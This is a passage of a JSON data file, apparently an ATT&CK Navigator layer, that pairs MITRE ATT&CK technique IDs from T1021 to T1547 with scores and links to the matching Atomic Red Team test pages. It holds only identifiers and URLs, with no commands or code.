b.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryc